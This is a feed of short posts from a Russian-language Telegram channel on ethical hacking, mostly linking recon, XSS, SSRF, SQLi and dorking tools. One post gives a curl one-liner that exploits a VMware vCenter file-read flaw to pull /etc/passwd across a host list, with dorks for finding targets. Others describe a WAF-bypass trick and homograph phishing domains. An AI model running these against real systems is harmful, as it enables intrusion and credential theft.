White Hat
11.8K subscribers
951 photos
51 videos
16 files
1.03K links
Пишем про информационную безопасность и белый хакинг.

Сотрудничество: @workhouse_price

Канал на бирже: https://telega.in/c/kind_hack

Канал в реестре РКН: https://clck.ru/3FtTnR
Download Telegram
🤛 Омографическая атака для фишинга

Эти атаки известны уже почти 20 лет, в их основе лежит принцип использования в доменных именах символов нелатинских алфавитов, внешне неотличимых от латинских букв.

В результате доменное имя выглядит как tᴡitter.com или clᴏudflare.com, однако переход по нему ведет на фальшивую страницу созданную для похищения логинов и паролей.

Для поиска доступных доменов, можно использовать Ditto - это небольшой инструмент, который принимает доменное имя в качестве входных данных и генерирует все его варианты для омографической атаки.

На выходе получаем список доменов, с отображением какие из них доступны, а какие уже зарегистрированы.

Ссылка на GitHub

#Web #Phishing
Please open Telegram to view this post
VIEW IN TELEGRAM
👍81💩1
Circadian - фоновый демон GNU/Linux

Инструмент для автоматического запуска приостановки/сна/гибернации GNU/Linux

Circadian использует набор «эвристик простоя», чтобы определить, когда система простаивает.

К ним относятся:
▫️ Действия пользователя в X11 (клавиатура, мышь, полноэкранное воспроизведение)
▫️ Действия пользователя в терминалах (ввод в сеансе PTY/SSH)
▫️ Открытые SSH-соединения
▫️ Открытые соединения SMB/Samba
▫️ Открытые соединения NFS
▫️ Активное воспроизведение звука
▫️ Использование ЦП ниже указанного порога
▫️ Процессы из черного списка

Когда все его эвристики определят, что ваша система бездействовала достаточно долго, Circadian выполнит команду. Обычно это простая приостановка питания, но ее можно настроить на любое желаемое действие.

☝🏻Circadian также может запланировать автоматическое ежедневное пробуждение.

Просто установите время пробуждения в его файле конфигурации, и он будет просыпаться один раз в день в это время (если он еще не проснулся). Это позволяет легко обновлять и создавать резервные копии машины, даже если она редко используется.

📶 Он также может выполнить команду, когда обнаружит, что система вышла из спящего режима, независимо от того, почему она проснулась.

Ссылка на GitHub

#Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
👍101
Бот для отслеживания новых уязвимостей

Используйте этого бота для мониторинга новых CVE, содержащих определенные ключевые слова, и отправки оповещений в Slack и/или Telegram.

Можно быстро отслеживать появление новых XSS, RCE и тд, писать кастомные шаблоны для Nuclei и прогонять их по своему списку хостов.

Ссылка на GitHub

#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
📑 Инструмент поиска XSS в AngularJS

Инструмент SSTI-XSS-Finder позволяет собирать из Shodan поддомены, которые используют технологию AngularJS, и предоставляет нам полезную нагрузку XSS, связанную с AngularJS-версией этого поддомена.

./SSTI-XSS-Finder.sh <Shodan-Dork>

Примеры дорков:

org:target
hostname:target.com
net:127.0.0.1

Ссылка на GitHub

#Web #XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2💩1
🏃‍♂ Инструмент: CRIU

Проект по реализации функций проверки/восстановления для GNU/Linux.

Используя этот инструмент, вы можете заморозить работающее приложение (или его часть) и сохранить его на жестком диске в виде набора файлов. Затем вы можете использовать файлы для восстановления и запуска приложения с того места, где оно было заморожено.

Отличительной особенностью проекта CRIU является то, что он преимущественно реализуется в пользовательском пространстве.

Ссылка на GitHub
Ссылка на оф. сайт

#Linux #restore
Please open Telegram to view this post
VIEW IN TELEGRAM
👍41💩1
📶 Мощный сканер веб-приложений, объединяющий широкий набор инструментов

reconFTW - это инструмент, предназначенный для выполнения автоматизированного сбора информации о целевом домене, путем запуска наилучшего набора инструментов для выполнения сканирования и выявления уязвимостей.

Он объединяет в себе множество популярных инструментов, которые мы уже рассматривали на канале. Подробнее о работе данного инструменты вы можете узнать на GitHub, но будьте уверены, инструмент заслуживает вашего внимания. Ниже представлена схема его работы.

Ссылка на GitHub

#Web
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9💩1🍓1
🔎 Автоматический поиск SSRF уязвимостей

Для поиска SSRF на сайте можно воспользоваться инструментом под названием SSRFire. Просто укажите доменное имя сайта, адрес своего сервера (или Burp Collaborator) и ждите результатов.

Также есть опции для поиска XSS и Open Redirect. Для работы инструмента требуются установленные Python 3.7+ и GO.

Ссылка на GitHub

#Web #XSS #SSRF
Please open Telegram to view this post
VIEW IN TELEGRAM
👍43💩1
🔎 Инструменты для работы с дорками

Небольшая подборка инструментов, которые позволят вам автоматизировать процесс доркинга.

🗄 GitDorker
🗄 Katana
🗄 Fast-Google-Dorks-Scan
🗄 oxdork
🗄 SDorker
🗄 pagodo
🗄 dorks-eye

Online инструменты:

🗄 Dorksearch
🗄 FilePhish
🗄 Bug Bounty Helper
🗄 Pentest-tools google-hacking

#Web #Recon #Dork
Please open Telegram to view this post
VIEW IN TELEGRAM
💩2
🏳‍🌈 Инструмент: gip (гугл доркинг по IPv4)

Google IP Search - это инструмент OSINT, написанный на JavaScript и HTML. Он использует Google dorks для ограничения поиска только IPv4-адресами.

🗄 Ссылка на сайт
🗄 Ссылка на GitHub

#OSINT #Recon
Please open Telegram to view this post
VIEW IN TELEGRAM
👍51💩1
This media is not supported in your browser
VIEW IN TELEGRAM
🔎 Новый инструмент для скана портов и поиска уязвимостей

Новый инструмент командной строки от разработчиков Shodan для быстрого анализа списка IP-адресов и просмотра того, какие из них имеют открытые порты/уязвимости.

Ссылка на Gitlab

#Web #Recon #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3💩1
😈 Как перехватить трафик в коммутируемой среде?

Анализ сетевого трафика всегда был неотъемлемой частью работы любого сетевого инженера, администратора сети для выявления проблем работоспособности и конфигурации активного оборудования. В этой статье узнаете как же всё таки перехватить трафик.

https://telegra.ph/Kak-perehvatit-trafik-v-kommutiruemoj-srede-02-16
Please open Telegram to view this post
VIEW IN TELEGRAM
⚫️ Обход WAF через большое количество символов

Если вы столкнулись с WAF, то для POST, PUT или PATCH запросов попробуйте вставить в параметр бесполезные символы с произвольными данными, размером от 8 КБ до 10 МБ, ПЕРЕД вашей вредоносной полезной нагрузкой.

Некоторые WAF прекращают обработку после X символов полезной нагрузки, разрешая все ПОСЛЕ этого. Рандомные символы можно сгенерировать тут.

#WAF #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
🔎 Инструмент: AnonymousOverflow

AnonymousOverflow позволяет вам просматривать потоки StackOverflow без загроможденного интерфейса и раскрытия вашего IP-адреса, привычек просмотра и других данных об отпечатках браузера которые преступно собирает StackOverflow.

Этот проект очень легкий по дизайну. Пользовательский интерфейс прост, а внешний интерфейс представляет собой SSR HTML, не требующий JavaScript.

🗄 Ссылка на GitHub

#Privacy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
🔐Обход авторизации в приложениях на Codeigniter

Отличная статья и видео-разбор, в котором вы узнаете, почему в Codeigniter, иногда можно обойти авторизацию с помощью пустого или рандомного JSON, а также обычной SQL инъекции в названии параметра.

🗄 Ссылка на YouTube

#Web #SQLi
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥1💩1
🔎 reconFTW — Комбайн для этичного хакера, который автоматизирует весь процесс разведки.

Он различными способами брутит поддомены (пассивный способ, перебор, перестановки, certificate transparency, парсинг исходного кода, аналитика, DNS-записи) и тестирует цели на подверженность различным уязвимостям. В конечном итоге вы получаете максимальный объем информации об исследуемых ресурсах.

🗄 Ссылка на репозиторий

#BugBounty #Pentest #Recon
Please open Telegram to view this post
VIEW IN TELEGRAM
👍31💩1
📖 Свежий список периодически обновляемых DNS-резолверов

Резолверы играют крайне важную роль в DNS. DNS-резолвер кэширует информацию. К примеру, сайт example.com расположен на машине с IP-адресом 35.195.226.230. Поэтому кэши резолверов со всего мира будут содержать следующее соответствие: example.com35.195.226.230.

Такие инструменты, как например, masscan, nuclei и т.д. позволяют использовать пользовательский список резолверов.

Используя широкий и актуальный список, мы расширяем возможности нашей разведки и имеем больший диапазон для тестирования сайта.

💬 Ссылка на GitHub

#Web #DNS
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1💩1
🟦 LFI, SSRF и XSS в VMware vCenter

В VMware vCenter обнаружили ряд уязвимостей, среди которых несанкционированное чтение произвольных файлов, SSRF и XSS. Протестировано на версии 7.0.2.00100, информации про полный список уязвимых версий нет.

Для поиска уязвимых хостов можно использовать однострочник:

cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done

Дорк, который можно использовать для поиска в Shodan:

http.title:"ID_VC_Welcome"

Для поиска в Zoomeye:

app:"VMware vCenter"

#LFI #SSRF #XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1💩1
🔍 ghauri — инструмент для автоматизации обнаружения и эксплуатации SQL-инъекций.

Усовершенствованный кроссплатформенный инструмент, который автоматизирует процесс обнаружения и использования уязвимостей безопасности SQL-инъекций.

🗄 Ссылка на репозиторий

#Tools #BugBounty #Pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4💩2
⌨️ Продвинутые специализации в сфере ИБ | ИНФОБЕЗДНА

В этом видео мы с вами разберем остальные специализации, которые существуют в ИБ.

Вы узнаете кто такие фиолетовая, зеленая, желтая, оранжевая и белая команды, а также узнаете какие специалисты входят в эти направления и что они делают.

🗄 Смотреть на YouTube

#Cybersecurity #Video
Please open Telegram to view this post
VIEW IN TELEGRAM
⚫️ Что такое XXE Injection? PortSwigger

Внедрение внешнего объекта XML
(XXE) — не самая распространенная, но зачастую критическая уязвимость. Она позволяет вмешиваться в обработку XML-данных веб-приложением.

Знаете ли вы, что кроме извлечения файлов, XXE можно использовать для выполнения SSRF-атак, скрытой эксфильтрации данных и извлечения данных с помощью сообщений об ошибках.

🗄 Подробнее

#XXE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 Веб-службы на нестандартных портах

Чтобы находить больше целей для поиска уязвимостей, следует проверять не только стандартные веб порты (80 и 443), но и нестандартные, такие как 8080, 10000, 8443 и другие, на которых могут располагаться веб-службы.

Если провести некоторый анализ Shodan и имеющихся там веб-служб, работающих на нестандартных портах, то можно выделить некоторый список наиболее распространённых портов, которые следует проверять во время фазы разведки:

httpx -l targets.list -p 8080,10000,20000,2222,7080,9009,7443,2087,2096,8443,4100,2082,2083,2086,9999,2052,9001,9002,7000,7001,8082,8084,8085,8010,9000,2078,2080,2079,2053,2095,4000,5280,8888,9443,5800,631,8000,8008,8087,84,85,86,88,10125,9003,7071,8383,7547,3434,10443,8089,3004,81,4567,7081,82,444,1935,3000,9998,4433,4431,4443,83,90,8001,8099,80,300,443,591,593,832,981,1010,1311,2480,3128,3333,4243,4711,4712,4993,5000,5104,5108,6543,7396,7474,8014,8042,8069,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8500,8834,8880,8983,9043,9060,9080,9090,9091,9200,9800,9981,12443,16080,18091,18092,20720,28017 -o livesites.result

#Web #Recon
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥32👍2🥴2🤡1